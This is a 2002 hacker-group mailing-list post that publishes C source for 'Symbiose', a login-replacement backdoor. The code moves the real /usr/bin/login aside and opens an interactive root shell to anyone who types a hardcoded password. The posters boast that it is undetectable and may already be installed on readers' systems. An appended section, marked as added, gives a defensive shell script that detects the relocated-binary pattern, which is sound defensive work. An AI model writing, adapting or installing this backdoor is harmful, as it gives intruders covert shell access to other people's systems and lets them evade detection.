Message-ID: <200211291645.gATGjYQl049023@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - New Backdoor Technique

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Here's a backdoor we wrote a while ago that is 100% stealth and cannot
be detected.  Be warned that such a backdoor may have been installed on
your system, as we are the Immortal Blackhats.

# cat symbsd.c
/*
 * [ E l e c t r o n i c - S o u l s ]
 *
 * Symbiose - UNIX Daemon Backdoor
 * (C) BrainStorm
 *
 * you have 1 second to enter the passwd,
 * else it will execute the original daemon.
 *
 */

#include<signal.h>
#include<stdio.h>
#include<string.h>
#include<unistd.h>

#define ORIGINAL "/usr/bin/.login"  /* the new path of the original daemon executable. */
#define BACKDOOR "/usr/bin/login"   /* u can also back door other daemons of course ;) */
#define PASS "es"  /* u may want to change this password.. */

char **execute;
char passwd[3];


int main(int argc, char *argv[]) {

void connection();

signal(SIGALRM,connection);

  alarm(3);
    execute=argv;
    *execute=BACKDOOR;

  scanf("%s",passwd);

if(strcmp(passwd,PASS)==0) {
  alarm(0);
  printf("  ****************************************************************** \n");
  printf("  ****************************************************************** \n");
  printf("[ *** Welcome to Symbiose ;) -- (C) BrainStorm [ElectronicSouls] *** ] \n");
  printf("  ****************************************************************** \n");
  printf("  ****************************************************************** \n\n");

  execl("/bin/sh","/bin/sh","-i",0);
  execv("id",execute);

exit(0);
}
else
{
  execv(ORIGINAL,execute);
  exit(0);
}

}
void connection()
{
  execv(ORIGINAL,execute);
  exit(0);
}

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"We don't know Latin."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nmcEMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltRr4An0oFAwVWHvQF
D3Xz84s4c3PFwEkuAJoDkE+GhGc8QCZdV5Z/rwWl3LQH0w==
=0rBN
-----END PGP SIGNATURE-----
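
Added example, not part of the original post or its authors' code: the posted wrapper takes the place of a system binary and moves the real one to a dot-prefixed name in the same directory (`/usr/bin/login` beside `/usr/bin/.login`), with the hidden path compiled in as a string, so a defender can sweep binary directories for exactly that pairing. The function names and the temporary fixture are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): flag the relocation pattern used
# by symbsd.c, where DIR/name is a wrapper and the real program sits at DIR/.name.

# find_shadowed_binaries DIR...
# Prints one line per hit: "<wrapper> <hidden original> <evidence>"
#   embedded-path : the visible file contains the hidden file's path as a string
#   name-only     : the pair exists but no path string was found (still review it)
find_shadowed_binaries() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        for hidden in "$dir"/.[!.]*; do
            # Only regular, executable dot-files are of interest.
            [ -f "$hidden" ] && [ -x "$hidden" ] || continue
            name=${hidden##*/}
            visible="$dir/${name#.}"
            [ -f "$visible" ] && [ -x "$visible" ] || continue
            if LC_ALL=C grep -a -q -F -- "$hidden" "$visible"; then
                echo "$visible $hidden embedded-path"
            else
                echo "$visible $hidden name-only"
            fi
        done
    done
}

# Constructed fixture so the check can be exercised without touching /usr/bin.
make_fixture() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/bin"
    printf '#!/bin/sh\nexec %s "$@"\n' "$root/bin/.login" > "$root/bin/login"
    printf '#!/bin/sh\necho real login\n' > "$root/bin/.login"
    printf '#!/bin/sh\necho ls\n' > "$root/bin/ls"
    printf 'not a program\n' > "$root/bin/.cache"   # hidden but not executable
    chmod 755 "$root/bin/login" "$root/bin/.login" "$root/bin/ls"
    echo "$root"
}

# Usage: sh this-script /bin /sbin /usr/bin /usr/sbin  (no trailing slashes)
if [ "$#" -gt 0 ]; then find_shadowed_binaries "$@"; fi
```

A hit is a lead rather than a verdict: confirm it against the package manager's recorded checksums (for example `rpm -Vf` or `debsums`) or a file-integrity baseline taken from known-good media.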



